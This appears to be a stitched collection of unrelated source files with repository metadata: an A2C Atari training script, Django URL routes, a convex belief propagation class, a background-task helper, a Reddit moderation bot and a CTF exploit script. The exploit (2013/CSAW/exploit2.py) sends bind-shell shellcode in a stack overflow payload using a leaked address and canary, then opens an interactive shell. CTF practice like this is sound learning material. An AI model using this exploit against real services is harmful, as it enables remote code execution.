super(AtariEnvironment, self).__init__()
self.daemon = True
self.env = gym.make(env_id)
self.env_id = env_id
self.is_render = is_render
self.env_idx = env_idx
self.steps = 0
self.episode = 0
self.rall = 0
self.recent_rlist = deque(maxlen=100)
self.child_conn = child_conn
self.history_size = history_size
self.history = np.zeros([history_size, h, w])
self.h = h
self.w = w
self.reset()
self.lives = self.env.env.ale.lives()
def run(self):
super(AtariEnvironment, self).run()
while True:
action = self.child_conn.recv()
if self.is_render:
self.env.render()
if 'Breakout' in self.env_id:
action += 1
_, reward, done, info = self.env.step(action)
if life_done:
if self.lives > info['ale.lives'] and info['ale.lives'] > 0:
force_done = True
self.lives = info['ale.lives']
else:
force_done = done
else:
force_done = done
self.history[:3, :, :] = self.history[1:, :, :]
self.history[3, :, :] = self.pre_proc(
self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))
self.rall += reward
self.steps += 1
if done:
self.recent_rlist.append(self.rall)
print("[Episode {}({})] Step: {} Reward: {} Recent Reward: {}".format(
self.episode, self.env_idx, self.steps, self.rall, np.mean(self.recent_rlist)))
self.history = self.reset()
self.child_conn.send(
[self.history[:, :, :], reward, force_done, done])
def reset(self):
self.steps = 0
self.episode += 1
self.rall = 0
self.env.reset()
self.lives = self.env.env.ale.lives()
self.get_init_state(
self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))
return self.history[:, :, :]
def pre_proc(self, X):
x = cv2.resize(X, (self.h, self.w))
x *= (1.0 / 255.0)
return x
def get_init_state(self, s):
for i in range(self.history_size):
self.history[i, :, :] = self.pre_proc(s)
class ActorAgent(object):
def __init__(
self,
input_size,
output_size,
num_env,
num_step,
gamma,
lam=0.95,
use_gae=True,
use_cuda=False,
use_noisy_net=False):
self.model = CnnActorCriticNetwork(
input_size, output_size, use_noisy_net)
self.num_env = num_env
self.output_size = output_size
self.input_size = input_size
self.num_step = num_step
self.gamma = gamma
self.lam = lam
self.use_gae = use_gae
self.optimizer = optim.Adam(self.model.parameters(), lr=learning_rate)
self.device = torch.device('cuda' if use_cuda else 'cpu')
self.model = self.model.to(self.device)
def get_action(self, state):
state = torch.Tensor(state).to(self.device)
state = state.float()
policy, value = self.model(state)
policy = F.softmax(policy, dim=-1).data.cpu().numpy()
action = self.random_choice_prob_index(policy)
return action
@staticmethod
    def random_choice_prob_index(p, axis=1):
        # vectorized categorical sampling: draw one uniform sample per row and take the
        # first index whose cumulative probability exceeds it
        r = np.expand_dims(np.random.rand(p.shape[1 - axis]), axis=axis)
        return (p.cumsum(axis=axis) > r).argmax(axis=axis)
def forward_transition(self, state, next_state):
state = torch.from_numpy(state).to(self.device)
state = state.float()
        policy, value = self.model(state)
next_state = torch.from_numpy(next_state).to(self.device)
next_state = next_state.float()
        _, next_value = self.model(next_state)
value = value.data.cpu().numpy().squeeze()
next_value = next_value.data.cpu().numpy().squeeze()
return value, next_value, policy
def train_model(self, s_batch, target_batch, y_batch, adv_batch):
with torch.no_grad():
s_batch = torch.FloatTensor(s_batch).to(self.device)
target_batch = torch.FloatTensor(target_batch).to(self.device)
y_batch = torch.LongTensor(y_batch).to(self.device)
adv_batch = torch.FloatTensor(adv_batch).to(self.device)
# for multiply advantage
policy, value = self.model(s_batch)
m = Categorical(F.softmax(policy, dim=-1))
# mse = nn.SmoothL1Loss()
mse = nn.MSELoss()
# Actor loss
actor_loss = -m.log_prob(y_batch) * adv_batch
# Entropy(for more exploration)
entropy = m.entropy()
# Critic loss
critic_loss = mse(value.sum(1), target_batch)
# Total loss
loss = actor_loss.mean() + 0.5 * critic_loss - entropy_coef * entropy.mean()
self.optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(self.model.parameters(), clip_grad_norm)
self.optimizer.step()
def make_train_data(reward, done, value, next_value):
discounted_return = np.empty([num_step])
if use_standardization:
reward = (reward - np.mean(reward)) / (np.std(reward) + stable_eps)
# Discounted Return
if use_gae:
gae = 0
for t in range(num_step - 1, -1, -1):
delta = reward[t] + gamma * \
next_value[t] * (1 - done[t]) - value[t]
gae = delta + gamma * lam * (1 - done[t]) * gae
discounted_return[t] = gae + value[t]
# For Actor
adv = discounted_return - value
else:
running_add = next_value[-1]
for t in range(num_step - 1, -1, -1):
running_add = reward[t] + gamma * running_add * (1 - done[t])
discounted_return[t] = running_add
# For Actor
adv = discounted_return - value
if use_standardization:
adv = (adv - np.mean(adv)) / (np.std(adv) + stable_eps)
return discounted_return, adv
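# A hedged reference sketch (added, not part of the original script): a standalone GAE
# computation that mirrors the loop in make_train_data but takes gamma and lam as
# arguments instead of reading module-level globals, so it can be exercised on its own,
# for example in a quick unit test. The function name is an illustrative assumption.
def gae_reference(rewards, dones, values, next_values, gamma=0.99, lam=0.95):
    returns = np.zeros(len(rewards))
    gae = 0.0
    for t in range(len(rewards) - 1, -1, -1):
        # TD residual: r_t + gamma * V(s_{t+1}) * (1 - done_t) - V(s_t)
        delta = rewards[t] + gamma * next_values[t] * (1 - dones[t]) - values[t]
        # exponentially weighted sum of residuals, reset at episode boundaries
        gae = delta + gamma * lam * (1 - dones[t]) * gae
        returns[t] = gae + values[t]
    advantages = returns - np.asarray(values)
    return returns, advantages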
if __name__ == '__main__':
env_id = 'BreakoutDeterministic-v4'
env = gym.make(env_id)
input_size = env.observation_space.shape # 4
output_size = env.action_space.n # 2
if 'Breakout' in env_id:
output_size -= 1
env.close()
writer = SummaryWriter()
use_cuda = True
use_gae = False
is_load_model = False
is_render = False
use_standardization = False
lr_schedule = False
life_done = True
use_noisy_net = False
model_path = 'models/{}.model'.format(env_id)
lam = 0.95
num_worker = 16
num_worker_per_env = 1
num_step = 5
max_step = 1.15e8
learning_rate = 0.00025
stable_eps = 1e-30
    epsilon = 0.1
entropy_coef = 0.01
alpha = 0.99
gamma = 0.99
clip_grad_norm = 3.0
agent = ActorAgent(
input_size,
output_size,
num_worker_per_env *
num_worker,
num_step,
gamma,
use_cuda=use_cuda,
use_noisy_net=use_noisy_net)
if is_load_model:
agent.model.load_state_dict(torch.load(model_path))
works = []
parent_conns = []
child_conns = []
for idx in range(num_worker):
parent_conn, child_conn = Pipe()
work = AtariEnvironment(env_id, is_render, idx, child_conn)
work.start()
works.append(work)
parent_conns.append(parent_conn)
child_conns.append(child_conn)
states = np.zeros([num_worker * num_worker_per_env, 4, 84, 84])
sample_episode = 0
sample_rall = 0
sample_step = 0
sample_env_idx = 0
global_step = 0
recent_prob = deque(maxlen=10)
while True:
total_state, total_reward, total_done, total_next_state, total_action = [], [], [], [], []
global_step += (num_worker * num_step)
for _ in range(num_step):
actions = agent.get_action(states)
for parent_conn, action in zip(parent_conns, actions):
parent_conn.send(action)
next_states, rewards, dones, real_dones = [], [], [], []
for parent_conn in parent_conns:
s, r, d, rd = parent_conn.recv()
next_states.append(s)
rewards.append(r)
dones.append(d)
real_dones.append(rd)
next_states = np.stack(next_states)
rewards = np.hstack(rewards)
dones = np.hstack(dones)
real_dones = np.hstack(real_dones)
total_state.append(states)
total_next_state.append(next_states)
total_reward.append(rewards)
total_done.append(dones)
total_action.append(actions)
states = next_states[:, :, :, :]
sample_rall += rewards[sample_env_idx]
sample_step += 1
if real_dones[sample_env_idx]:
sample_episode += 1
writer.add_scalar('data/reward', sample_rall, sample_episode)
writer.add_scalar('data/step', sample_step, sample_episode)
sample_rall = 0
sample_step = 0
total_state = np.stack(total_state).transpose(
[1, 0, 2, 3, 4]).reshape([-1, 4, 84, 84])
total_next_state = np.stack(total_next_state).transpose(
[1, 0, 2, 3, 4]).reshape([-1, 4, 84, 84])
total_reward = np.stack(
total_reward).transpose().reshape([-1]).clip(-1, 1)
total_action = np.stack(total_action).transpose().reshape([-1])
total_done = np.stack(total_done).transpose().reshape([-1])
value, next_value, policy = agent.forward_transition(
total_state, total_next_state)
policy = policy.detach()
m = F.softmax(policy, dim=-1)
recent_prob.append(m.max(1)[0].mean().cpu().numpy())
writer.add_scalar(
'data/max_prob',
np.mean(recent_prob),
sample_episode)
total_target = []
total_adv = []
for idx in range(num_worker):
target, adv = make_train_data(total_reward[idx * num_step:(idx + 1) * num_step],
total_done[idx *
num_step:(idx + 1) * num_step],
value[idx *
num_step:(idx + 1) * num_step],
next_value[idx * num_step:(idx + 1) * num_step])
# print(target.shape)
total_target.append(target)
total_adv.append(adv)
agent.train_model(
total_state,
np.hstack(total_target),
total_action,
np.hstack(total_adv))
# adjust learning rate
if lr_schedule:
            new_learning_rate = learning_rate - \
                (global_step / max_step) * learning_rate
            for param_group in agent.optimizer.param_groups:
                param_group['lr'] = new_learning_rate
            writer.add_scalar('data/lr', new_learning_rate, sample_episode)
if global_step % (num_worker * num_step * 100) == 0:
torch.save(agent.model.state_dict(), model_path)
| 2.28125
| 2
|
award/urls.py
|
stevekibe/Awards
| 0
|
12780143
|
from django.conf import settings
from django.conf.urls.static import static
from django.conf.urls import url
from . import views
urlpatterns=[
    url(r'^$', views.index, name='index'),
url(r'^new/post$',views.new_project, name='new-project'),
url(r'votes/$',views.vote_project, name='vote_project'),
url(r'^user/(\d+)$',views.detail, name='detail'),
url(r'^detail/edit/$', views.edit_detail, name='edit-detail'),
    url(r'^viewproject/(\d+)$', views.view_project, name='viewproject'),
url(r'^search/$', views.search_results, name='search-project'),
url(r'^comment/(?P<project_id>\d+)', views.add_comment, name='comment'),
url(r'^vote/(?P<project_id>\d+)', views.vote, name='vote'),
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
| 1.914063
| 2
|
2013/CSAW/exploit2.py
|
parksjin01/ctf
| 0
|
12780144
|
<gh_stars>0
from pwn import *
import binascii
sh = remote('localhost', 31338)
buf_addr = sh.recv(4)
secret = sh.recv(4)
print binascii.hexlify(secret)
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# overflow layout: shellcode padded to fill the 0x800-byte buffer, the leaked secret value
# echoed back (presumably to satisfy a cookie check), 12 filler bytes, then the leaked
# buffer address so execution returns into the shellcode
payload = shellcode + 'A' * (0x800 - len(shellcode)) + secret + 'C' * 12 + buf_addr
print sh.recv(1024)
raw_input()
sh.sendline(payload)
new_sh = remote('localhost', 1337)
new_sh.interactive()
| 1.8125
| 2
|
mrftools/ConvexBeliefPropagator.py
|
berty38/mrftools
| 0
|
12780145
|
"""Convexified Belief Propagation Class"""
import numpy as np
from .MatrixBeliefPropagator import MatrixBeliefPropagator, logsumexp, sparse_dot
class ConvexBeliefPropagator(MatrixBeliefPropagator):
"""
Class to perform convexified belief propagation based on counting numbers. The class allows for non-Bethe
    counting numbers for the different factors in the MRF. If the counting numbers are all non-negative, then the adjusted
Bethe free energy is convex, providing better guarantees about the convergence and bounds of the primal
and dual objective values.
"""
def __init__(self, markov_net, counting_numbers=None):
"""
Initialize a convexified belief propagator.
:param markov_net: MarkovNet object encoding the probability distribution
:type markov_net: MarkovNet
:param counting_numbers: a dictionary with an entry for each variable and edge such that the value is a float
representing the counting number to use in computing the convexified Bethe formulas
and corresponding message passing updates.
:type counting_numbers: dict
"""
super(ConvexBeliefPropagator, self).__init__(markov_net)
self.unary_counting_numbers = np.ones(len(self.mn.variables))
self.edge_counting_numbers = np.ones(2 * self.mn.num_edges)
default_counting_numbers = dict()
for var in markov_net.variables:
default_counting_numbers[var] = 1
for neighbor in markov_net.neighbors[var]:
if var < neighbor:
default_counting_numbers[(var, neighbor)] = 1
if counting_numbers:
self._set_counting_numbers(counting_numbers)
else:
self._set_counting_numbers(default_counting_numbers)
def _set_counting_numbers(self, counting_numbers):
"""
Store the provided counting numbers and set up the associated vectors for the ordered variable representation.
:param counting_numbers: a dictionary with an entry for each variable and edge with counting number values
:type counting_numbers: dict
:return: None
"""
self.edge_counting_numbers = np.zeros(2 * self.mn.num_edges)
for edge, i in self.mn.message_index.items():
reversed_edge = edge[::-1]
if edge in counting_numbers:
self.edge_counting_numbers[i] = counting_numbers[edge]
self.edge_counting_numbers[i + self.mn.num_edges] = counting_numbers[edge]
elif reversed_edge in counting_numbers:
self.edge_counting_numbers[i] = counting_numbers[reversed_edge]
self.edge_counting_numbers[i + self.mn.num_edges] = counting_numbers[reversed_edge]
else:
raise KeyError('Edge %s was not assigned a counting number.' % repr(edge))
self.unary_counting_numbers = np.zeros((len(self.mn.variables), 1))
for var, i in self.mn.var_index.items():
self.unary_counting_numbers[i] = counting_numbers[var]
self.unary_coefficients = self.unary_counting_numbers.copy()
for edge, i in self.mn.message_index.items():
self.unary_coefficients[self.mn.var_index[edge[0]]] += self.edge_counting_numbers[i]
self.unary_coefficients[self.mn.var_index[edge[1]]] += self.edge_counting_numbers[i]
    def compute_bethe_entropy(self):
        """Compute the Bethe entropy of the current beliefs, weighted by the counting numbers."""
if self.fully_conditioned:
entropy = 0
else:
entropy = - np.sum(self.edge_counting_numbers[:self.mn.num_edges] *
(np.nan_to_num(self.pair_belief_tensor) * np.exp(self.pair_belief_tensor))) \
- np.sum(self.unary_counting_numbers.T *
(np.nan_to_num(self.belief_mat) * np.exp(self.belief_mat)))
return entropy
    def update_messages(self):
        """Update all messages with the counting-number-weighted rule and return the total absolute change."""
self.compute_beliefs()
adjusted_message_prod = self.mn.edge_pot_tensor - np.hstack((self.message_mat[:, self.mn.num_edges:],
self.message_mat[:, :self.mn.num_edges]))
adjusted_message_prod /= self.edge_counting_numbers
adjusted_message_prod += self.belief_mat[:, self.mn.message_from]
messages = np.squeeze(logsumexp(adjusted_message_prod, 1)) * self.edge_counting_numbers
messages = np.nan_to_num(messages - messages.max(0))
change = np.sum(np.abs(messages - self.message_mat))
self.message_mat = messages
return change
    def compute_beliefs(self):
        """Compute unary log beliefs, dividing by the combined unary and edge counting numbers."""
if not self.fully_conditioned:
self.belief_mat = self.mn.unary_mat + self.augmented_mat
self.belief_mat += sparse_dot(self.message_mat, self.mn.message_to_map)
self.belief_mat /= self.unary_coefficients.T
log_z = logsumexp(self.belief_mat, 0)
self.belief_mat = self.belief_mat - log_z
    def compute_pairwise_beliefs(self):
        """Compute pairwise log beliefs for all edges using counting-number-scaled messages."""
if not self.fully_conditioned:
adjusted_message_prod = self.belief_mat[:, self.mn.message_from] \
- np.nan_to_num(np.hstack((self.message_mat[:, self.mn.num_edges:],
self.message_mat[:, :self.mn.num_edges])) /
self.edge_counting_numbers)
to_messages = adjusted_message_prod[:, :self.mn.num_edges].reshape(
(self.mn.max_states, 1, self.mn.num_edges))
from_messages = adjusted_message_prod[:, self.mn.num_edges:].reshape(
(1, self.mn.max_states, self.mn.num_edges))
beliefs = self.mn.edge_pot_tensor[:, :, self.mn.num_edges:] / \
self.edge_counting_numbers[self.mn.num_edges:] + to_messages + from_messages
beliefs -= logsumexp(beliefs, (0, 1))
self.pair_belief_tensor = beliefs
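# Usage sketch (an addition, not part of the original module). It shows the shape of the
# counting-number dictionary this class expects: one float per variable and one per edge
# (var, neighbor) with var < neighbor, mirroring how __init__ builds its defaults. The
# existence of an already-constructed MarkovNet `mn` and of the inherited infer() method
# are assumptions about the surrounding mrftools code.
#
#     edge_weight = 0.75   # any non-negative choice keeps the objective convex
#     counting_numbers = {}
#     for var in mn.variables:
#         counting_numbers[var] = 1.0
#         for neighbor in mn.neighbors[var]:
#             if var < neighbor:
#                 counting_numbers[(var, neighbor)] = edge_weight
#     bp = ConvexBeliefPropagator(mn, counting_numbers)
#     bp.infer()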
| 2.875
| 3
|
sshpipe/sshpipe/lib/subprocess/__init__.py
|
Acrisel/sshpipe
| 0
|
12780146
|
<filename>sshpipe/sshpipe/lib/subprocess/__init__.py
from .sshsubprocess import run
| 1.242188
| 1
|
command_line/pytest_launcher.py
|
dials/dx2
| 0
|
12780147
|
<filename>command_line/pytest_launcher.py
# LIBTBX_SET_DISPATCHER_NAME pytest
import sys
import pytest
# modify sys.argv so the command line help shows the right executable name
sys.argv[0] = "pytest"
sys.exit(pytest.main())
| 1.570313
| 2
|
client/gap/contact.py
|
brandsafric/weqtrading
| 1
|
12780148
|
<gh_stars>1-10
import os
import webapp2
import jinja2
from google.appengine.ext import ndb
from google.appengine.api import users
import logging
import json
class Contact(ndb.Expando):
    contact_id = ndb.StringProperty()
    names = ndb.StringProperty()
    cell = ndb.StringProperty()
    email = ndb.StringProperty()
    subject = ndb.StringProperty()
    message = ndb.StringProperty()
| 1.8125
| 2
|
backgroundtasks.py
|
chadspratt/AveryDB
| 0
|
12780149
|
<reponame>chadspratt/AveryDB<filename>backgroundtasks.py<gh_stars>0
"""Code to handle queuing and execution of background tasks."""
##
# Copyright 2013 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import table
import sqlite3
class BackgroundTasks(object):
    """Queue and execute "background" tasks such as file conversion and index building
    (relies on the host class for tasks_to_process, taskinprogress, files, gui,
    executejoinqueued, executejoin, and updatesample)."""
def queuetask(self, task=None):
"""Add a task to the process queue but don't start processing."""
if task:
self.tasks_to_process.append(task)
def processtasks(self, task=None):
"""Process all the queued "background" tasks, like converting files."""
if task:
self.tasks_to_process.append(task)
if not self.taskinprogress:
self.taskinprogress = True
while self.tasks_to_process:
tasktype, taskdata = self.tasks_to_process.pop(0)
if tasktype == 'index':
self.buildindex(taskdata)
self.updatesample('refresh sample')
elif tasktype == 'sample':
# a needed sql table might not be created yet
try:
self.updatesample(taskdata)
# if it fails, add it back to the end of the task list
except sqlite3.OperationalError:
self.tasks_to_process.append((tasktype, taskdata))
elif tasktype == 'sqlite':
filealias, dataconverter = taskdata
self.converttosql(filealias, dataconverter)
elif tasktype == 'lengthadjust':
self.adjustfieldlengths(taskdata)
# This has to go after conversion is done.
if self.executejoinqueued:
self.gui['executejointoggle'].set_active(False)
self.executejoin(None)
self.taskinprogress = False
def buildindex(self, join):
"""Build index in the background"""
indexalias = join.joinalias
indexfield = join.joinfield
self.files[indexalias].buildindex(indexfield)
def converttosql(self, filealias, dataconverter):
"""Convert a file to an SQLite table."""
progresstext = 'Converting to sqlite: ' + filealias
self.gui.setprogress(0, progresstext)
# Run the generator until it's finished. It yields % progress.
try:
for progress in dataconverter:
# this progress update lets the GUI function
self.gui.setprogress(progress, progresstext, lockgui=False)
except table.FileClosedError:
print 'File removed, aborting conversion.'
self.gui.setprogress(0, '')
def adjustfieldlengths(self, lengthdetectgen):
"""Run the generator that finds and sets min field lengths."""
progresstext = 'Adjusting field lengths'
self.gui.setprogress(0, progresstext)
# Run the generator until it's finished. It yields % progress.
for progress in lengthdetectgen:
# this progress update lets the GUI function
self.gui.setprogress(progress, progresstext, lockgui=False)
self.gui.setprogress(0, '')
| 2.75
| 3
|
bot.py
|
kevinchu-sg/reddit-csv-bot
| 2
|
12780150
|
<reponame>kevinchu-sg/reddit-csv-bot
#!/usr/bin/env python3
import praw
import csv
from datetime import datetime, timedelta
import time
#-------------------------------------------------
#OPTIONS
USERNAME = ''
PASSWORD = ''
user_agent = 'management by /u/kevinosaurus' #user-agent details
csv_list = ['log1.csv', 'log2.csv'] #log1 corresponds to subreddit 1's data, etc.
sr_list = ['all', 'letschat'] #sr stands for subreddit
limit = 25 #get 25 latest/newest posts from subreddit
POST_LIMIT = 10 #days
TIMER = 60 #seconds
COMMENTS = '''
You have posted similar links too frequently. Please try again later.
I am a bot. Message /u/kevinosaurus for more help!
'''
MOD_TITLE = 'bot report' # you can use the %(old_c)s etc variables in the title too!
MOD_MSG = '''
Bot report
----------
Old thread: %(old_t)s
New thread: %(new_t)s
Old thread creator: %(old_c)s
New thread creator: %(new_c)s
''' # %(old_t)s and such are the variables. You can change the messages and retain the variables.
#-------------------------------------------------
def main():
r = praw.Reddit(user_agent=user_agent)
r.login(USERNAME, PASSWORD, disable_warning=True)
for sr in sr_list:
subreddit = r.get_subreddit(sr)
with open(csv_list[sr_list.index(sr)], 'r+') as file:
fieldnames = ['key', 'username', 'datetime', 'location']
reader = csv.DictReader(file)
writer = csv.DictWriter(file, fieldnames=fieldnames)
newFile = []
for thread in subreddit.get_new(limit=limit):
if thread.url != thread.permalink:
t_key = thread.url
t_user = thread.author
t_date = datetime.fromtimestamp(thread.created)
t_loc = thread.permalink
for row in reader:
if row['key'] == t_key:
t_exist = True
t_csv_key = row['key']
t_csv_date = row['datetime']
t_csv_user = row['username']
else:
t_exist = False
if t_exist:
if (datetime.fromtimestamp(t_csv_date) + timedelta(days=POST_LIMIT)) < datetime.now():
thread.add_comment(COMMENTS)
                            thread.delete()
else:
for row2 in reader:
                                if t_key not in newFile and t_key != row2['key']:
newFile.append(row2)
writer.writerows(newFile)
writer.writerow({'key': t_key, 'username': t_user, 'datetime': t_date, 'location': t_loc})
if t_csv_user != t_user:
                                mod_title = MOD_TITLE % {'old_t': t_csv_key, 'new_t': t_key, 'old_c': t_csv_user, 'new_c': t_user}
                                mod_msg = MOD_MSG % {'old_t': t_csv_key, 'new_t': t_key, 'old_c': t_csv_user, 'new_c': t_user}
                                r.send_message('/r/'+sr, mod_title, mod_msg)
else:
writer.writerow({'key': t_key, 'username': t_user, 'datetime': t_date, 'location': t_loc})
while True:
main()
time.sleep(TIMER)
| 2.484375
| 2
|